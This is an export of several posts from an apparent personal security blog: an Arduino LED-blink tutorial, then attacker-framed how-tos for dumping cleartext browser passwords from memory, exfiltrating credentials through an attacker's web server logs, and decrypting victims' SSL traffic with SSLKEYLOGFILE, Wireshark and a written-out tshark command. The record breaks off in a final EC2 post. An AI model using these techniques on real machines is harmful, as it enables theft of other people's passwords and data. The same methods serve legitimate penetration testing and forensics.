<li>You need Arduino IDE for writing a program, and its similar to C programming!</li>
<li>Download your IDE from https://www.arduino.cc/en/Main/Software</li>
<li>Setup() function is used for setting up environment, like declaring variables </li>
<li>loop() function is used for executing code continuously</li>
</ol>
<div>
void setup() {</div>
<div>
<div>
// initialize digital pin 13 as an output.</div>
<div>
pinMode(13, OUTPUT);</div>
<div>
}</div>
<div>
<br /></div>
<div>
// the loop function runs over and over again forever</div>
<div>
void loop() {</div>
<div>
digitalWrite(13, HIGH); // turn the LED on (HIGH is the voltage level)</div>
<div>
delay(100); // wait for a second</div>
<div>
digitalWrite(13, LOW); // turn the LED off by making the voltage LOW</div>
<div>
delay(100); // wait for a second</div>
<div>
}</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
That's it, now its time to run your first program on Arduino UNO.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Blue LED - Short Leg connected to GND and Long Leg connected to pin 13 of Arduino</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrKwLnNia8JfwNSQ3cumXn6tTK9TsTXwY-VSBjxUE2aJV-bmqkLGbevsbJd7vBKHttwumYXZiZHxasWae5TrEGV92DgBb1utCTLBeXn1q_mJFBhZWTrmzxb9colRVe8ozzPqLueiDyGXz/s1600/20160501_002546.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrKwLnNia8JfwNSQ3cumXn6tTK9TsTXwY-VSBjxUE2aJV-bmqkLGbevsbJd7vBKHttwumYXZiZHxasWae5TrEGV92DgBb1utCTLBeXn1q_mJFBhZWTrmzxb9colRVe8ozzPqLueiDyGXz/s400/20160501_002546.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Arduino IDE - Program to Blink LED connected on pin 13</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyK3bRLWbUOhVnugwTaBpdmiAlywbIFexvKZE-7TsC4OE8GCLaoX2HSxlVFsQ1BJymdJJej8SSmArGuaueHieRHDAsOrrq_tv5dhFgcxnWsRLvycjxhCtUFpfH_TaTiYSHPRRdRIJ9EpzF/s1600/Arduino_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyK3bRLWbUOhVnugwTaBpdmiAlywbIFexvKZE-7TsC4OE8GCLaoX2HSxlVFsQ1BJymdJJej8SSmArGuaueHieRHDAsOrrq_tv5dhFgcxnWsRLvycjxhCtUFpfH_TaTiYSHPRRdRIJ9EpzF/s400/Arduino_1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
LED Started Blinking!....</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8_KR0KCISuiVNMt0DKFkJLp2ihLK3wCdW5WUKnQhnG2PE5HDLIHIRELm2waWgTRokHIy5S_cwn001jpw1mp0QiJ2NbUrV81hb1frweWoAQwFBieMVrAN0eEKbl2DuEVxMw3dS91naL7n/s1600/20160501_002524.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8_KR0KCISuiVNMt0DKFkJLp2ihLK3wCdW5WUKnQhnG2PE5HDLIHIRELm2waWgTRokHIy5S_cwn001jpw1mp0QiJ2NbUrV81hb1frweWoAQwFBieMVrAN0eEKbl2DuEVxMw3dS91naL7n/s400/20160501_002524.jpg" width="300" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Will post more on Arduino Board soon...</div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-38050057135681754762016-04-19T08:17:00.002-07:002016-04-19T08:30:31.992-07:00Dumping Clear Text browser passwords from Windows Memory<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
We all know about Mimikatz tool being used for dumping windows credentials from memory.<br />
What if we want to retrieve passwords from web browser or other applications from memory?<br />
Ex. google.com, facebook.com or any other website/corporate web portals<br />
<br />
Most of the time in corporate network, employees logs in to corporate portal with Domain passwords.<br />
If you can dump memory from machine and analyse to it to get web passwords in clear text then this trick really helps!<br />
<br />
Download tool called Dumpit from <a href="https://drive.google.com/open?id=0B4fmHoqW8qjTTTdhN2NHZ0s0STQ">here</a><br />
<br />
Lets imagine a scenario where victim has logged in to Gmail.com<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWE1JwUApAy1zs2mYnmYvs7JR1aVnhs61-lTxUzn8I9SFmwY-cypKFicWJ3waZ6nXgipUBuJU1DmJPqwH4H71flWEfi5_9lAzN3mXNQzcy_7SuwmvQmyUmF7gR2ze3BkhMiFMlRIgpuWc3/s1600/pass_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWE1JwUApAy1zs2mYnmYvs7JR1aVnhs61-lTxUzn8I9SFmwY-cypKFicWJ3waZ6nXgipUBuJU1DmJPqwH4H71flWEfi5_9lAzN3mXNQzcy_7SuwmvQmyUmF7gR2ze3BkhMiFMlRIgpuWc3/s400/pass_2.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Attacker executed Dumpit.exe with Admin rights<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTV1OcnpOSa78-9YB7UVnbj7okJ1fGZ0z_Dr_9pettRYfdLfxAdS655b74GdwCItJkJtWb04Kavpx28PspGdSRH7P_2NSKrKYksT2KmQjOqpj8_-f1vgZorAuBCWRpCcXkxE4WiIyqKbDK/s1600/pass_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTV1OcnpOSa78-9YB7UVnbj7okJ1fGZ0z_Dr_9pettRYfdLfxAdS655b74GdwCItJkJtWb04Kavpx28PspGdSRH7P_2NSKrKYksT2KmQjOqpj8_-f1vgZorAuBCWRpCcXkxE4WiIyqKbDK/s400/pass_3.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You can simply analyse .raw dump file with windows "find" command or "findstr" command.<br />
and you can get all passwords in clear text!<br />
<br />
Below screenshot you can see clear text passwords for gmail.com entered earlier in browser!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJih_PSz2mMTf31xm6_J1FMe4KyO4Q3uRU2ZDbHBXhXd0Ix2093aoiIlKPh8uAbOC6cbEkpQPXI_OwCdTJ49gJ_xkFKdfIU1ykbnxuVxc9JOOGveeQEpzbRQUBR6Kt1yi4zcvPv1Gx75pJ/s1600/pass_%2521.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJih_PSz2mMTf31xm6_J1FMe4KyO4Q3uRU2ZDbHBXhXd0Ix2093aoiIlKPh8uAbOC6cbEkpQPXI_OwCdTJ49gJ_xkFKdfIU1ykbnxuVxc9JOOGveeQEpzbRQUBR6Kt1yi4zcvPv1Gx75pJ/s400/pass_%2521.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-54335527854844820102016-04-19T06:37:00.001-07:002016-04-19T06:39:34.439-07:00Data Exfiltration via HTTP / Web server logs<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi ,<br />
<br />
I was just working on project, and got an Idea of exfiltrating data via HTTP!......<br />
This might be already know to you, but adding here for documenting purpose.<br />
<br />
Scenario :<br />
What is if you have access to a victim machine and quickly want to ex filtrate some very important figures/key data or may be anything.<br />
<br />
First thing is copy all your data in this case attacker wants to exfiltrate some victim credentials.<br />
<br />
Simply paste data after attackers domain name / IP this will generate Logs at attackers web server.<br />
Attacker will simply open web server log file and read the ex-filtrated data i.e credentials.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ydWmZijo8RJXjvw0NW8gg5aKBIB5RhPhEvmd0ot7Klu-lGyBWx1fNA1NPgz3u_en-1zUW8zcjlhYYvN12cs5mVEz-dK73fJTe6kNaR-58YyBeGCmk7YXBRJgVjr4ymkMlpJDkqLKi99q/s1600/data_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ydWmZijo8RJXjvw0NW8gg5aKBIB5RhPhEvmd0ot7Klu-lGyBWx1fNA1NPgz3u_en-1zUW8zcjlhYYvN12cs5mVEz-dK73fJTe6kNaR-58YyBeGCmk7YXBRJgVjr4ymkMlpJDkqLKi99q/s400/data_1.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Attackers opens web server logs and look for ex-filtrated data<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WPlOQdHBgspACZ18WW-gQ4fxWlFdMhOl1vYW5K3D1L9_8wz5T8JeoI2Dswv8LjN9jOGbk6pmsDUlB0PkqDEijH7ajvl4kSvyQR4u1NDiGVQtNidICqgfoiMDw5RmhWCJNwrDffYJzJf-/s1600/data_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WPlOQdHBgspACZ18WW-gQ4fxWlFdMhOl1vYW5K3D1L9_8wz5T8JeoI2Dswv8LjN9jOGbk6pmsDUlB0PkqDEijH7ajvl4kSvyQR4u1NDiGVQtNidICqgfoiMDw5RmhWCJNwrDffYJzJf-/s400/data_2.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Attacker replaces by default encoded characters and view credentials<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPcjipbbCHWRX1WqFRTHR93j4i6Ik0cK6riB_4iXMbHrMBBQrWMFKTkfXw96zMhyphenhyphenejqubGmw5SexOTxkTx6l8i99nMtp0Ck0tEDOHRHMBux_HEeH2PEXvavMmmM1u8p6Jt-CnJWoexQZhk/s1600/data_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPcjipbbCHWRX1WqFRTHR93j4i6Ik0cK6riB_4iXMbHrMBBQrWMFKTkfXw96zMhyphenhyphenejqubGmw5SexOTxkTx6l8i99nMtp0Ck0tEDOHRHMBux_HEeH2PEXvavMmmM1u8p6Jt-CnJWoexQZhk/s400/data_3.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Although its very simple trick but its works in real environment!..<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-17506150488241900432016-04-15T05:08:00.000-07:002016-04-15T05:08:04.444-07:00Decrypting SSL traffic via tshark<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Just a thought what is we get domain access, can access any machine within network and further eavesdrop on SSL connections on multiple machines? one step ahead, send data to attacker!<br />
<br />
tshark -n -r ssl.pcapng -o http.ssl.port:443,4430-4433 -o ssl.keylog_file:sslkeylog.log -Y ssl -V -Y "http.request" | find "pass"<br />
<br />
<br />
<ol style="text-align: left;">
<li>"ssl.pcappng" is our pcap dump file</li>
<li>"sslkeylog.log" is our pre master secret file containing SSL keys generated by browser</li>
<li>"-o" is used to change preferences setting for SSL protocol to get SSL keys from log file.</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-oVZpDth2fREe0DIDQR1X6XDePibxhlEbO0gVdpniHEchZfC4NbIfeLOq4XVeO9yILzdNGaH81XonsleVn2RXKgxNhttN_3kXQ5FfKMriEG2EJsLVEmzGtoLhFtt5_f9pS90QvZM6UNrR/s1600/ssl_5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-oVZpDth2fREe0DIDQR1X6XDePibxhlEbO0gVdpniHEchZfC4NbIfeLOq4XVeO9yILzdNGaH81XonsleVn2RXKgxNhttN_3kXQ5FfKMriEG2EJsLVEmzGtoLhFtt5_f9pS90QvZM6UNrR/s400/ssl_5.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hope this helps!</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-53710422071731202882016-04-15T04:27:00.001-07:002016-04-15T04:27:52.487-07:00Decrypt SSL Traffic<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Hi Consider a scenario where attacker has access to client machines and want to further intercept SSL traffic to extract may be bank username, password or anything over SSL!!!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Well first thing attacker need to enable logging of SSL keys!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
How can you log SSL Keys in a log file?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
By default, Crome and Firefox browser has capability to export SSL keys provided you point your browsers to the flat log file location, well how can you point your browsers to log all keys into the log file ?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
For this you need to follow below steps :</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ol style="text-align: left;">
<li>Create user environment "Variable name" = SSLKEYLOGFILE<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uS1Tqgqly3OKzgk9mTo61VUtXbbjzaI9Cf_0skjPv3XkgtWxDDf8YjoYbUiM4gJM38wPpU33uunhkFV2uRMXHa6knUAP_J7Vn9Eat7JPuf7nuRAHR2CI5tDqzfLz7nU7cFIh6ikXHiew/s1600/ssl_1.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uS1Tqgqly3OKzgk9mTo61VUtXbbjzaI9Cf_0skjPv3XkgtWxDDf8YjoYbUiM4gJM38wPpU33uunhkFV2uRMXHa6knUAP_J7Vn9Eat7JPuf7nuRAHR2CI5tDqzfLz7nU7cFIh6ikXHiew/s400/ssl_1.png" width="400" /></a></li>
<li>Set the "Variable value" = Path of log file where you want to save SSL logs</li>
<li>Ex. Variable value = C:\users\admin\ssllog.log</li>
<li>Create blank file on above specified path "c:\users\admin" with same name "ssllog.log" </li>
<li>That's it!....</li>
<li>Start browsing any SSL enabled websites Ex. https://www.yahoo.com</li>
<li>You will see that browser has started depositing SSL key data in your "ssllog.log" file<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yew0UCN8t0ZdB-LvbxHWJd2Gb3Fk7J58mQrDwL8DXQ98yBNUIRL0FmvNeLMvlxk0GDVvEXTGGhGKcXO3yxlxEBpdEUaFNKWNGDlIewTZIMd19JJVieOE0fOshv0caj7NvnsJd6y0tw5I/s1600/ssl_2.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yew0UCN8t0ZdB-LvbxHWJd2Gb3Fk7J58mQrDwL8DXQ98yBNUIRL0FmvNeLMvlxk0GDVvEXTGGhGKcXO3yxlxEBpdEUaFNKWNGDlIewTZIMd19JJVieOE0fOshv0caj7NvnsJd6y0tw5I/s400/ssl_2.png" width="400" /></a></li>
<li>Now it's matter of time before you decrypt the traffic using Wire shark</li>
<li>Open your Wireshark instance</li>
<li>Go to Edit > Preferences > Protocols > Select SSL and add the location of "ssllog.log" file<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvIxqaYsHvvevKB6nQzBwzFRD-pcMAW77m0OedapJ2hi0lk0dpFW29qx5h45FH0dzmbqM1gWR4BZQETu3JQpYIb9ngMNYkp86Ctvr2leOL8xPIw-zioqrjNCw2FXsl84fZxoOmtGQcZpvQ/s1600/ssl_3.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvIxqaYsHvvevKB6nQzBwzFRD-pcMAW77m0OedapJ2hi0lk0dpFW29qx5h45FH0dzmbqM1gWR4BZQETu3JQpYIb9ngMNYkp86Ctvr2leOL8xPIw-zioqrjNCw2FXsl84fZxoOmtGQcZpvQ/s400/ssl_3.png" width="400" /></a></li>
<li>Now your are all set to decrypt SSL traffic of websites being visited on the browser!</li>
<li>Lets open https://yahoo.com and login with your username and password</li>
<li>You can see that traffic has been decrypted by wireshark and we can clearly see usernames and passwords in plain text!!!!</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqZGV-drLiuoP2LoSxb9yp0LUnpXJsuNqHRZuTkXTkXFqWtwkHFTxxf3iv9FWUFr4rXZvEvt109kvWUCH58nNfUN1KNKYhzyQ17kBV1hHPDEBHy9Dlu_PgGVOoFUp-uhoTQ7_3IiXOJ3d/s1600/ssl_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> <img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqZGV-drLiuoP2LoSxb9yp0LUnpXJsuNqHRZuTkXTkXFqWtwkHFTxxf3iv9FWUFr4rXZvEvt109kvWUCH58nNfUN1KNKYhzyQ17kBV1hHPDEBHy9Dlu_PgGVOoFUp-uhoTQ7_3IiXOJ3d/s400/ssl_4.png" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
That's it, we have successfully decrypted SSL traffic, although its older technique but still effective.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-32816876465421490912016-03-18T22:23:00.002-07:002016-03-18T22:25:59.221-07:00Amazing Download and upload Speed from Amazon EC2 instance<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Amazing Download and upload Speed from Amazon EC2 instance!!<br />
<br />
<img alt="Image result for amazon ec2 black" src="data:image/jpeg;base64,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